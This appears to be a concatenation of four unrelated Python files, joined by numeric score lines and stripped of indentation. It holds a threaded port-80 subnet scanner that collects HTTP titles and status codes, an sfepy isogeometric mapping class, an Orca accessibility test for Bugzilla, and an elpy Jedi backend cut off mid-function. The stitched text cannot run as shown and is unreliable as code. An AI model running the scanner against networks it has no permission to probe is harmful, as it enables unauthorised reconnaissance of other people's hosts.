BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m'
class ThreadManager(object):
i = 0
def __init__(self, ipList):
self.allIps = ipList
self.size = len(ipList)
def getNextIp(self):
if not (self.i >= self.size - 1):
ip = self.allIps[self.i]
self.i += 1
return ip
return 0
def getID(self):
return self.i + 1
def coreOptions():
options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"],
["title-timeout", "Timeout (in sec) for title resolve.", "3"], ["threads", "Number of threads to run.", "50"],
["verbose", "Show verbose output.", "true"]]
return options
def createIPList(network):
net4 = ipaddress.ip_network(network)
ipList = []
for x in net4.hosts():
ipList.append(x)
return ipList
def print1(data):
if verbose:
print("\033[K" + data)
def checkServer(address, port):
s = socket.socket()
s.settimeout(float(portTimeout))
try:
s.connect((address, port))
s.close()
return True
except socket.error:
s.close()
return False
except:
s.close()
return "FAIL"
def getHTTP(address, port):
code = None
title = None
try:
r = requests.get("http://" + address, timeout=float(titleTimeout), allow_redirects=True)
except:
return False
try:
code = r.status_code
except:
pass
try:
tree = fromstring(r.content)
title = tree.findtext('.//title')
except:
pass
return [title, code]
def writeToFile(line):
file = open(fileName, "a")
file.write(line)
file.close()
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget():
sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str(
allIPs) + GREEN + " hosts done." + END)
restart_line()
sys.stdout.flush()
def scan(i):
global status
global openPorts
global done
while True:
if stop:
sys.exit()
ip = threadManager.getNextIp()
if ip == 0:
break
status = (threadManager.getID() / allIPs) * 100
status = format(round(status, 2))
status = str(status) + "%"
stringIP = str(ip)
isUp = checkServer(stringIP, port)
if isUp != "FAIL":
if isUp:
openPorts = openPorts + 1
print1(GREEN + "[+] Port 80 is open on '" + stringIP + "'" + END)
http = getHTTP(stringIP, 80)
if not http:
print1(YELLOW + "[!] Failed to get the HTTP response of '" + stringIP + "'" + END)
title = "NO-TITLE"
code = "NO-CODE"
else:
title = str(http[0])
code = str(http[1])
if code is not None:
print1(GREEN + "[+] Response code of '" + stringIP + "': '" + code + "'" + END)
else:
print1(YELLOW + "[!] Failed to get the response code of '" + stringIP + "'" + YELLOW)
code = "NO-CODE"
if title is not None:
title = title.replace("\n", "")
try:
print1(GREEN + "[+] Title of '" + stringIP + "': '" + title + "'" + END)
except:
print1(YELLOW + "[!] Failed to print title of '" + stringIP + "'" + END)
title = "NO-TITLE"
else:
print1(YELLOW + "[!] Failed to get title of '" + stringIP + "'" + YELLOW)
title = "NO-TITLE"
logLine = stringIP + " - " + "80 OPEN" + " - " + code + " - " + title + "\n"
logLines.append(logLine)
elif not isUp:
print1(RED + "[-] Port 80 is closed on '" + stringIP + "'" + END)
else:
print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END)
done = done + 1
def core(moduleOptions):
print(
"\n" + GREEN + "HTTP module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n")
global status
global fileName
global allIPs
global portTimeout
global titleTimeout
global ips
global threadCount
global done
global verbose
global stop
global port
global openPorts
global logLines
global threadManager
logLines = []
stop = False
done = 0
portTimeout = moduleOptions[1][2]
titleTimeout = moduleOptions[2][2]
network = moduleOptions[0][2]
threadCount = int(moduleOptions[3][2])
verbose = moduleOptions[4][2]
if verbose == "true":
verbose = True
else:
verbose = False
try:
ipList = createIPList(network)
allIPs = len(ipList)
if allIPs == 0:
raise Exception
except:
print(RED + "[!] Invalid subnet. Exiting...\n")
return
threadManager = ThreadManager(ipList)
i = datetime.datetime.now()
i = str(i).replace(" ", "_")
i = str(i).replace(":", "-")
script_path = os.path.dirname(os.path.realpath(__file__))
script_path = script_path.replace("modules", "")
if not os.path.exists(script_path + "logs"):
os.makedirs(script_path + "logs")
fileName = script_path + "logs/log-http-portSpider-" + i + ".log"
file = open(fileName, 'w')
file.write("subnet: " + network + "\n")
file.close()
port = 80
openPorts = 0
threads = []
for i in range(threadCount):
i -= 1
t = threading.Thread(target=scan, args=(i,))
t.daemon = True
threads.append(t)
t.start()
try:
while True:
if done == threadCount and threadManager.getID() == allIPs:
break
statusWidget()
except KeyboardInterrupt:
stop = True
verbose = False
print("\n" + RED + "[I] Stopping..." + END)
stop = True
verbose = False
for logLine in logLines:
try:
writeToFile(logLine)
except:
writeToFile("WRITING-ERROR")
print("\n\n" + GREEN + "[I] HTTP module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
| 0.004162 |
"""
Reference mappings for isogeometric analysis.
"""
import numpy as nm
from sfepy.discrete.common.mappings import Mapping
from sfepy.discrete.common.extmods.mappings import CMapping
import sfepy.discrete.iga.extmods.igac as iga
class IGMapping(Mapping):
"""
Reference mapping for isogeometric analysis based on Bezier extraction.
Parameters
----------
domain : IGDomain instance
The mapping domain.
cells : array
The mapping region cells. (All domain cells required.)
nurbs : NurbsPatch instance, optional
If given, the `nurbs` is used instead of `domain.nurbs`. The `nurbs`
has to be obtained by degree elevation of `domain.nurbs`.
"""
def __init__(self, domain, cells, nurbs=None):
self.domain = domain
self.cells = cells
self.nurbs = domain.nurbs if nurbs is None else nurbs
self.v_shape = (len(cells), -1, self.domain.shape.dim)
self.s_shape = (len(cells), -1, 1)
def get_geometry(self):
"""
Return reference element geometry as a GeometryElement instance.
"""
return self.domain.gel
def get_physical_qps(self, qp_coors):
"""
Get physical quadrature points corresponding to given reference
Bezier element quadrature points.
Returns
-------
qps : array
The physical quadrature points ordered element by element,
i.e. with shape (n_el, n_qp, dim).
"""
nurbs = self.nurbs
variable = nm.ones((nurbs.weights.shape[0], 1), dtype=nm.float64)
qps, _, _ = iga.eval_variable_in_qp(variable, qp_coors, nurbs.cps,
nurbs.weights, nurbs.degrees,
nurbs.cs, nurbs.conn, self.cells)
qps = qps.reshape(self.v_shape)
return qps
def get_mapping(self, qp_coors, weights):
"""
Get the mapping for given quadrature points and weights.
Returns
-------
cmap : CMapping instance
The reference mapping.
Notes
-----
Does not set total volume of the C mapping structure!
"""
nurbs = self.nurbs
bfs, bfgs, dets = iga.eval_mapping_data_in_qp(qp_coors, nurbs.cps,
nurbs.weights,
nurbs.degrees, nurbs.cs,
nurbs.conn, self.cells)
# Weight Jacobians by quadrature point weights.
dets = nm.abs(dets) * weights[None, :, None, None]
# Cell volumes.
volumes = dets.sum(axis=1)[..., None]
cmap = CMapping(self.v_shape[0], qp_coors.shape[0], self.v_shape[2],
bfs.shape[3], mode='volume', flag=1)
cmap.bf[:] = bfs
cmap.bfg[:] = bfgs
cmap.det[:] = dets
cmap.volume[:] = volumes
return cmap
| 0.000334 |
#!/usr/bin/python
"""Test of label guess for bugzilla's advanced search page."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
#sequence.append(WaitForDocLoad())
sequence.append(PauseAction(5000))
# Work around some new quirk in Gecko that causes this test to fail if
# run via the test harness rather than manually.
sequence.append(KeyComboAction("<Control>r"))
sequence.append(PauseAction(3000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Shift>ISO_Left_Tab"))
sequence.append(utils.AssertPresentationAction(
"1. Shift Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"BRAILLE LINE: 'Summary: contains all of the words/strings combo box'",
" VISIBLE: 'Summary: contains all of the wor', cursor=10",
"SPEECH OUTPUT: 'Summary: contains all of the words/strings combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"2. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"3. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'Search push button'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"4. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: 'Admin'",
" VISIBLE: 'Admin', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Classification: multi-select List with 8 items'",
"SPEECH OUTPUT: 'Admin.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"5. Tab",
["BRAILLE LINE: 'Admin'",
" VISIBLE: 'Admin', cursor=1",
"BRAILLE LINE: 'accerciser'",
" VISIBLE: 'accerciser', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Product: multi-select List with 379 items'",
"SPEECH OUTPUT: 'accerciser.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"6. Tab",
["BRAILLE LINE: 'Component'",
" VISIBLE: 'Component', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"BRAILLE LINE: 'Component'",
" VISIBLE: 'Component', cursor=1",
"SPEECH OUTPUT: 'Component link.'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"7. Tab",
["BRAILLE LINE: 'abiscan'",
" VISIBLE: 'abiscan', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'Component: multi-select List with 1248 items'",
"SPEECH OUTPUT: 'abiscan.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"8. Tab",
["BRAILLE LINE: 'abiscan'",
" VISIBLE: 'abiscan', cursor=1",
"BRAILLE LINE: '0.0.1'",
" VISIBLE: '0.0.1', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Version: multi-select List with 857 items'",
"SPEECH OUTPUT: '0.0.1.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"9. Tab",
["BRAILLE LINE: '---'",
" VISIBLE: '---', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Target Milestone: multi-select List with 555 items'",
"SPEECH OUTPUT: '---.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"10. Tab",
["BRAILLE LINE: 'A Comment: contains the string combo box'",
" VISIBLE: 'A Comment: contains the string c', cursor=12",
"SPEECH OUTPUT: 'A Comment: contains the string combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"11. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"12. Tab",
["BRAILLE LINE: 'Whiteboard: contains all of the words/strings combo box'",
" VISIBLE: 'Whiteboard: contains all of the ', cursor=13",
"SPEECH OUTPUT: 'Whiteboard: contains all of the words/strings combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"13. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"14. Tab",
["BRAILLE LINE: 'Keywords'",
" VISIBLE: 'Keywords', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"BRAILLE LINE: 'Keywords'",
" VISIBLE: 'Keywords', cursor=1",
"SPEECH OUTPUT: 'Keywords link.'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"15. Tab",
["BRAILLE LINE: 'Keywords: contains all of the keywords combo box'",
" VISIBLE: 'Keywords: contains all of the ke', cursor=11",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'Keywords: contains all of the keywords combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"16. Tab",
["BRAILLE LINE: 'Keywords: contains all of the keywords combo box'",
" VISIBLE: 'Keywords: contains all of the ke', cursor=11",
"BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"17. Tab",
["BRAILLE LINE: 'UNCONFIRMED'",
" VISIBLE: 'UNCONFIRMED', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Status: multi-select List with 8 items'",
"SPEECH OUTPUT: 'UNCONFIRMED.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"18. Tab",
["BRAILLE LINE: 'FIXED'",
" VISIBLE: 'FIXED', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Resolution: multi-select List with 12 items'",
"SPEECH OUTPUT: 'FIXED.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"19. Tab",
["BRAILLE LINE: 'blocker'",
" VISIBLE: 'blocker', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Severity: multi-select List with 7 items'",
"SPEECH OUTPUT: 'blocker.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"20. Tab",
["BRAILLE LINE: 'Immediate'",
" VISIBLE: 'Immediate', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'Priority: multi-select List with 5 items'",
"SPEECH OUTPUT: 'Immediate.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"21. Tab",
["BRAILLE LINE: 'All'",
" VISIBLE: 'All', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'OS: multi-select List with 21 items'",
"SPEECH OUTPUT: 'All.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"22. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'Email and Numbering panel'",
"SPEECH OUTPUT: 'the bug assignee check box checked'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"23. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: '< > the reporter check box'",
" VISIBLE: '< > the reporter check box', cursor=1",
"SPEECH OUTPUT: 'the reporter check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"24. Tab",
["BRAILLE LINE: '< > the QA contact check box'",
" VISIBLE: '< > the QA contact check box', cursor=1",
"SPEECH OUTPUT: 'the QA contact check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"25. Tab",
["BRAILLE LINE: '< > a CC list member check box'",
" VISIBLE: '< > a CC list member check box', cursor=1",
"SPEECH OUTPUT: 'a CC list member check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"26. Tab",
["BRAILLE LINE: '< > a commenter check box'",
" VISIBLE: '< > a commenter check box', cursor=1",
"SPEECH OUTPUT: 'a commenter check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"27. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'contains combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"28. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"29. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'the bug assignee check box checked'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"30. Tab",
["BRAILLE LINE: '<x> the bug assignee check box'",
" VISIBLE: '<x> the bug assignee check box', cursor=1",
"BRAILLE LINE: '<x> the reporter check box'",
" VISIBLE: '<x> the reporter check box', cursor=1",
"SPEECH OUTPUT: 'the reporter check box checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"31. Tab",
["BRAILLE LINE: '<x> the QA contact check box'",
" VISIBLE: '<x> the QA contact check box', cursor=1",
"SPEECH OUTPUT: 'the QA contact check box checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"32. Tab",
["BRAILLE LINE: '<x> a CC list member check box'",
" VISIBLE: '<x> a CC list member check box', cursor=1",
"SPEECH OUTPUT: 'a CC list member check box checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"33. Tab",
["BRAILLE LINE: '< > a commenter check box'",
" VISIBLE: '< > a commenter check box', cursor=1",
"SPEECH OUTPUT: 'a commenter check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"34. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: 'contains combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"35. Tab",
["BRAILLE LINE: 'contains combo box'",
" VISIBLE: 'contains combo box', cursor=1",
"BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"36. Tab",
["BRAILLE LINE: 'Only include combo box'",
" VISIBLE: 'Only include combo box', cursor=1",
"SPEECH OUTPUT: 'Only include combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"37. Tab",
["BRAILLE LINE: 'bugs numbered: $l'",
" VISIBLE: 'bugs numbered: $l', cursor=16",
"SPEECH OUTPUT: 'bugs numbered: entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"38. Tab",
["BRAILLE LINE: 'Only bugs changed between: $l'",
" VISIBLE: 'Only bugs changed between: $l', cursor=28",
"SPEECH OUTPUT: 'Bug Changes panel'",
"SPEECH OUTPUT: 'List with 3 items'",
"SPEECH OUTPUT: 'Only bugs changed between: entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"39. Tab",
["BRAILLE LINE: 'and Now $l'",
" VISIBLE: 'and Now $l', cursor=8",
"BRAILLE LINE: 'and Now $l'",
" VISIBLE: 'and Now $l', cursor=8",
"SPEECH OUTPUT: 'and entry Now selected'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"40. Tab",
["BRAILLE LINE: '[Bug creation]'",
" VISIBLE: '[Bug creation]', cursor=1",
"SPEECH OUTPUT: 'where one or more of the following changed: multi-select List with 26 items'",
"SPEECH OUTPUT: '[Bug creation].'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"41. Tab",
["BRAILLE LINE: 'and the new value was: $l'",
" VISIBLE: 'and the new value was: $l', cursor=24",
"SPEECH OUTPUT: 'and the new value was: entry'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"42. Tab",
["BRAILLE LINE: 'Unspecified'",
" VISIBLE: 'Unspecified', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'GNOME version: multi-select List with 14 items'",
"SPEECH OUTPUT: 'Unspecified.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"43. Tab",
["BRAILLE LINE: 'Unspecified'",
" VISIBLE: 'Unspecified', cursor=1",
"SPEECH OUTPUT: 'table with 2 rows 1 column'",
"SPEECH OUTPUT: 'GNOME target: multi-select List with 12 items'",
"SPEECH OUTPUT: 'Unspecified.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"44. Tab",
["BRAILLE LINE: 'Sort results by: Reuse same sort as last time combo box'",
" VISIBLE: 'Sort results by: Reuse same sort', cursor=18",
"SPEECH OUTPUT: 'Sort results by: Reuse same sort as last time combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"45. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: 'Browse mode'",
" VISIBLE: 'Browse mode', cursor=0",
"SPEECH OUTPUT: 'Search push button'",
"SPEECH OUTPUT: 'Browse mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"46. Tab",
["BRAILLE LINE: 'Search push button'",
" VISIBLE: 'Search push button', cursor=1",
"BRAILLE LINE: '< > and remember these as my default search options check box'",
" VISIBLE: '< > and remember these as my def', cursor=1",
"SPEECH OUTPUT: 'and remember these as my default search options check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"47. Tab",
["BRAILLE LINE: '< > Not (negate this whole chart) check box'",
" VISIBLE: '< > Not \(negate this whole chart', cursor=1",
"SPEECH OUTPUT: 'Not (negate this whole chart) check box not checked'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"48. Tab",
["BRAILLE LINE: '--- combo box'",
" VISIBLE: '--- combo box', cursor=1",
"BRAILLE LINE: 'Focus mode'",
" VISIBLE: 'Focus mode', cursor=0",
"SPEECH OUTPUT: '--- combo box.'",
"SPEECH OUTPUT: 'Focus mode' voice=system"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"49. Tab",
["BRAILLE LINE: '--- combo box'",
" VISIBLE: '--- combo box', cursor=1",
"BRAILLE LINE: '--- combo box'",
" VISIBLE: '--- combo box', cursor=1",
"SPEECH OUTPUT: '--- combo box.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"50. Tab",
["BRAILLE LINE: ' $l'",
" VISIBLE: ' $l', cursor=1",
"SPEECH OUTPUT: 'entry'"]))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
| 0.000501 |
"""Elpy backend using the Jedi library.
This backend uses the Jedi library:
https://github.com/davidhalter/jedi
"""
import sys
import traceback
import jedi
from elpy import rpc
class JediBackend(object):
"""The Jedi backend class.
Implements the RPC calls we can pass on to Jedi.
Documentation: http://jedi.jedidjah.ch/en/latest/docs/plugin-api.html
"""
name = "jedi"
def __init__(self, project_root):
self.project_root = project_root
self.completions = {}
sys.path.append(project_root)
def rpc_get_completions(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
proposals = run_with_debug(jedi, 'completions',
source=source, line=line, column=column,
path=filename, encoding='utf-8')
if proposals is None:
return []
self.completions = dict((proposal.name, proposal)
for proposal in proposals)
return [{'name': proposal.name,
'suffix': proposal.complete,
'annotation': proposal.type,
'meta': proposal.description}
for proposal in proposals]
def rpc_get_completion_docstring(self, completion):
proposal = self.completions.get(completion)
if proposal is None:
return None
else:
return proposal.docstring(fast=False)
def rpc_get_completion_location(self, completion):
proposal = self.completions.get(completion)
if proposal is None:
return None
else:
return (proposal.module_path, proposal.line)
def rpc_get_docstring(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
try:
locations = run_with_debug(jedi, 'goto_definitions',
source=source, line=line, column=column,
path=filename, encoding='utf-8',
re_raise=jedi.NotFoundError)
except jedi.NotFoundError:
return None
if locations:
return ('Documentation for {0}:\n\n'.format(
locations[-1].full_name) + locations[-1].docstring())
else:
return None
def rpc_get_definition(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
try:
locations = run_with_debug(jedi, 'goto_definitions',
source=source, line=line, column=column,
path=filename, encoding='utf-8',
re_raise=jedi.NotFoundError)
except jedi.NotFoundError:
return None
# goto_definitions() can return silly stuff like __builtin__
# for int variables, so we fall back on goto() in those
# cases. See issue #76.
if (
locations and
locations[0].module_path is None
):
locations = run_with_debug(jedi, 'goto_assignments',
source=source, line=line,
column=column,
path=filename, encoding='utf-8')
if not locations:
return None
else:
loc = locations[-1]
try:
if loc.module_path:
if loc.module_path == filename:
offset = linecol_to_pos(source,
loc.line,
loc.column)
else:
with open(loc.module_path) as f:
offset = linecol_to_pos(f.read(),
loc.line,
loc.column)
except IOError:
return None
return (loc.module_path, offset)
def rpc_get_calltip(self, filename, source, offset):
line, column = pos_to_linecol(source, offset)
calls = run_with_debug(jedi, 'call_signatures',
source=source, line=line, column=column,
path=filename, encoding='utf-8')
if calls:
call = calls[0]
else:
call = None
if not call:
return None
return {"name": call.name,
"index": call.index,
"params": [param.description for param in call.params]}
def rpc_get_usages(self, filename, source, offset):
"""Return the uses of the symbol at offset.
Returns a list of occurrences of the symbol, as dicts with the
fields name, filename, and offset.
"""
line, column = pos_to_linecol(source, offset)
try:
uses = run_with_debug(jedi, 'usages',
source=source, line=line, column=column,
path=filename, encoding='utf-8',
re_raise=(jedi.NotFoundError,))
except jedi.NotFoundError:
return []
if uses is None:
return None
result = []
for use in uses:
if use.module_path == filename:
offset = linecol_to_pos(source, use.line, use.column)
elif use.module_path is not None:
with open(use.module_path) as f:
text = f.read()
offset = linecol_to_pos(text, use.line, use.column)
result.append({"name": use.name,
"filename": use.module_path,
"offset": offset})
return result
# From the Jedi documentation:
#
# line is the current line you want to perform actions on (starting
# with line #1 as the first line). column represents the current
# column/indent of the cursor (starting with zero). source_path
# should be the path of your file in the file system.
def pos_to_linecol(text, pos):
"""Return a tuple of line and column for offset pos in text.
Lines are one-based, columns zero-based.
This is how Jedi wants it. Don't ask me why.
"""
line_start = text.rfind("\n", 0, pos) + 1
line = text.count("\n", 0, line_start) + 1
col = pos - line_start
return line, col
def linecol_to_pos(text, line, col):
"""Return the offset of this line and column in text.
Lines are one-based, columns zero-based.
This is how Jedi wants it. Don't ask me why.
"""
nth_newline_offset = 0
for i in range(line - 1):
new_offset = text.find("\n", nth_newline_offset)
if new_offset < 0:
raise ValueError("Text does not have {0} lines."
.format(line))
nth_newline_offset = new_offset + 1
offset = nth_newline_offset + col
if offset > len(text):
raise ValueError("Line {0} column {1} is not within the text"
